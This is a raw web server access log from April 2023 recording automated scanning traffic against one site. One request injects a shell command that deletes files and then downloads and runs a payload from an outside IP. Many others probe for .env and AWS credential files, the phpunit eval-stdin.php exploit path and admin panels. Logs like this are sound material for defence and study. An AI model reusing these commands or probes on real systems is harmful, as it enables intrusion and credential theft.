20.234.111.129 - - [04/Apr/2023:03:21:59 +0000] "POST /debug/default/view HTTP/1.1" 405 411899 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:03:22:01 +0000] "POST /frontend/web/debug/default/view HTTP/1.1" 405 412605 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:03:22:02 +0000] "POST /web/debug/default/view HTTP/1.1" 405 412113 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:03:22:04 +0000] "POST /sapi/debug/default/view HTTP/1.1" 405 412179 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:03:22:05 +0000] "POST /debug/default/view?panel=config HTTP/1.1" 405 413122 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
198.235.24.129 - - [04/Apr/2023:03:40:48 +0000] "\x16\x03\x01" 400 226 "-" "-"
27.124.12.21 - - [04/Apr/2023:04:01:02 +0000] "GET /v/6259065.html HTTP/1.1" 200 - "/v/6259065.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.154.128.189 - - [04/Apr/2023:04:09:36 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
23.147.226.84 - - [04/Apr/2023:04:13:00 +0000] "GET / HTTP/1.1" 200 8383 "http://13.244.159.169:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
45.8.22.79 - - [04/Apr/2023:04:15:20 +0000] "GET /.env HTTP/1.1" 200 - "-" "python-requests/2.28.2"
193.32.162.159 - - [04/Apr/2023:04:28:03 +0000] "GET / HTTP/1.1" 200 8381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
189.201.149.25 - - [04/Apr/2023:04:46:23 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
64.62.197.60 - - [04/Apr/2023:04:51:59 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70"
64.62.197.60 - - [04/Apr/2023:04:53:10 +0000] "GET /favicon.ico HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 OPR/95.0.0.0 (Edition Yx 05)"
64.62.197.56 - - [04/Apr/2023:04:53:40 +0000] "GET /geoserver/web/ HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70"
172.104.11.4 - - [04/Apr/2023:04:58:09 +0000] "\x16\x03\x01" 400 226 "-" "-"
193.32.162.159 - - [04/Apr/2023:05:14:12 +0000] "GET / HTTP/1.1" 200 8380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
135.125.244.48 - - [04/Apr/2023:05:30:22 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [04/Apr/2023:05:30:22 +0000] "POST / HTTP/1.1" 405 409713 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [04/Apr/2023:05:37:42 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [04/Apr/2023:05:37:44 +0000] "POST / HTTP/1.1" 405 409726 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
134.122.135.59 - - [04/Apr/2023:05:52:51 +0000] "GET /tvplay/181442.html HTTP/1.1" 200 - "/tvplay/181442.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
135.125.244.48 - - [04/Apr/2023:05:57:15 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [04/Apr/2023:05:57:16 +0000] "POST / HTTP/1.1" 405 409715 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
117.209.119.163 - - [04/Apr/2023:06:06:37 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
117.209.119.163 - - [04/Apr/2023:06:06:37 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
179.43.177.242 - - [04/Apr/2023:06:22:30 +0000] "GET / HTTP/1.1" 200 41226 "-" "Hello World"
198.199.118.63 - - [04/Apr/2023:06:42:11 +0000] "MGLNDD_13.244.159.169_80\n" 400 226 "-" "-"
43.154.128.189 - - [04/Apr/2023:06:46:23 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
184.73.78.62 - - [04/Apr/2023:06:59:59 +0000] "POST / HTTP/1.1" 405 409683 "-" "Mozilla/5.0 (Macintosh;                 Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,                 like Gecko) Chrome/39.0.2171.95 Safari/537.36"
184.73.78.62 - - [04/Apr/2023:07:00:01 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh;                 Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,                 like Gecko) Chrome/39.0.2171.95 Safari/537.36"
185.254.196.173 - - [04/Apr/2023:07:05:04 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [04/Apr/2023:07:05:04 +0000] "POST / HTTP/1.1" 405 409712 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
::1 - - [04/Apr/2023:07:10:22 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:07:10:29 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:07:10:30 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:07:10:31 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:07:10:32 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:07:10:33 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:07:10:34 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:07:10:35 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:07:10:36 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:07:10:37 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:07:10:38 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:07:10:39 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:07:10:40 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:07:10:41 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:07:10:42 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:07:10:48 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:07:14:18 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:07:14:19 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:07:14:20 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:07:14:21 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:07:14:22 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:07:14:23 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:07:14:24 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:07:14:25 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
118.31.118.27 - - [04/Apr/2023:07:21:01 +0000] "\x03" 400 226 "-" "-"
162.221.192.26 - - [04/Apr/2023:07:24:53 +0000] "GET / HTTP/1.1" 200 8385 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
154.209.125.58 - - [04/Apr/2023:07:31:47 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
154.209.125.115 - - [04/Apr/2023:07:31:48 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
154.209.125.115 - - [04/Apr/2023:07:31:48 +0000] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
20.234.111.129 - - [04/Apr/2023:07:32:18 +0000] "GET /.env.www HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:07:32:18 +0000] "POST /.env.www HTTP/1.1" 405 412197 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:07:32:22 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [04/Apr/2023:07:32:22 +0000] "GET /.env_1 HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:07:32:23 +0000] "POST /.env_1 HTTP/1.1" 405 412089 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:07:32:24 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [04/Apr/2023:07:32:25 +0000] "GET /.env_sample HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:07:32:25 +0000] "POST /.env_sample HTTP/1.1" 405 412419 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:07:32:27 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [04/Apr/2023:07:32:27 +0000] "GET /.aws/credentials HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:07:32:28 +0000] "POST /.aws/credentials HTTP/1.1" 405 412707 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:07:32:30 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [04/Apr/2023:07:32:30 +0000] "GET /_static/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:07:32:31 +0000] "POST /_static/.env HTTP/1.1" 405 412501 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:07:32:33 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [04/Apr/2023:07:32:33 +0000] "GET /.c9/metadata/environment/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:07:32:34 +0000] "POST /.c9/metadata/environment/.env HTTP/1.1" 405 413443 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:07:32:36 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [04/Apr/2023:07:32:37 +0000] "GET /.docker/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:07:32:38 +0000] "POST /.docker/.env HTTP/1.1" 405 412477 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:07:32:41 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [04/Apr/2023:07:32:41 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:07:32:42 +0000] "POST /.env HTTP/1.1" 405 411991 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:07:32:44 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [04/Apr/2023:07:32:45 +0000] "GET /.env.backup HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:07:32:45 +0000] "POST /.env.backup HTTP/1.1" 405 412409 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:07:32:48 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [04/Apr/2023:07:32:49 +0000] "GET /.env.dev HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:07:32:49 +0000] "POST /.env.dev HTTP/1.1" 405 412201 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:07:32:52 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [04/Apr/2023:07:32:52 +0000] "GET /.env.bak%20 HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:07:32:53 +0000] "POST /.env.bak%20 HTTP/1.1" 405 412425 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:07:32:54 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
20.234.111.129 - - [04/Apr/2023:07:32:55 +0000] "GET /.env.old HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:07:32:55 +0000] "POST /.env.old HTTP/1.1" 405 412217 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:07:32:58 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
135.125.246.110 - - [04/Apr/2023:07:37:47 +0000] "POST / HTTP/1.1" 405 409716 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
31.56.48.139 - - [04/Apr/2023:07:50:10 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
::1 - - [04/Apr/2023:07:55:18 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
159.203.240.10 - - [04/Apr/2023:07:58:08 +0000] "GET / HTTP/1.1" 200 8380 "-" "Mozilla/5.0 zgrab/0.x"
::1 - - [04/Apr/2023:08:13:24 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:08:13:25 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:08:13:26 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:08:13:27 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:08:13:28 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:08:13:29 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:08:13:30 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:08:13:31 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:08:13:32 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:08:13:33 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:08:13:35 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:08:13:36 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:08:13:37 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:08:13:38 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:08:13:39 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:08:22:39 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
152.32.236.73 - - [04/Apr/2023:08:30:32 +0000] "GET / HTTP/1.1" 200 41226 "-" "curl/7.29.0"
152.32.236.73 - - [04/Apr/2023:08:30:33 +0000] "\x16\x03\x01" 400 226 "-" "-"
135.125.246.110 - - [04/Apr/2023:08:31:54 +0000] "POST / HTTP/1.1" 405 409720 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [04/Apr/2023:08:37:18 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [04/Apr/2023:08:37:19 +0000] "POST / HTTP/1.1" 405 409694 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
165.154.119.44 - - [04/Apr/2023:08:40:13 +0000] "GET / HTTP/1.1" 200 8382 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/565.36 (KHTML, like Gecko) Chrome/63.0.1039 Safari/537.36"
165.154.119.44 - - [04/Apr/2023:08:40:14 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/570.51 (KHTML, like Gecko) Chrome/76.0.394 Safari/537.36"
165.154.119.44 - - [04/Apr/2023:08:40:15 +0000] "GET /assets/front/10bucksonly/img/10-bucksonly.png HTTP/1.1" 200 8443 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/576.46 (KHTML, like Gecko) Chrome/88.0.2687 Safari/537.36"
165.154.119.44 - - [04/Apr/2023:08:40:16 +0000] "GET /assets/admin/base/plugins/bootstrap-datepicker/js/bootstrap-datepicker.min.js HTTP/1.1" 200 10073 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/585.35 (KHTML, like Gecko) Chrome/92.0.2479 Safari/537.36"
165.154.119.44 - - [04/Apr/2023:08:40:16 +0000] "GET /assets/front/10bucksonly/js/main.js HTTP/1.1" 200 1672 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.36 (KHTML, like Gecko) Chrome/77.0.1196 Safari/537.36"
165.154.119.44 - - [04/Apr/2023:08:40:16 +0000] "GET /assets/front/10bucksonly/js/typeahead.bundle.js HTTP/1.1" 200 17759 "-" "Mozilla/5.0 (Windows NT 7_2_1; Win64; x64) AppleWebKit/558.51 (KHTML, like Gecko) Chrome/50.0.1983 Safari/537.36"
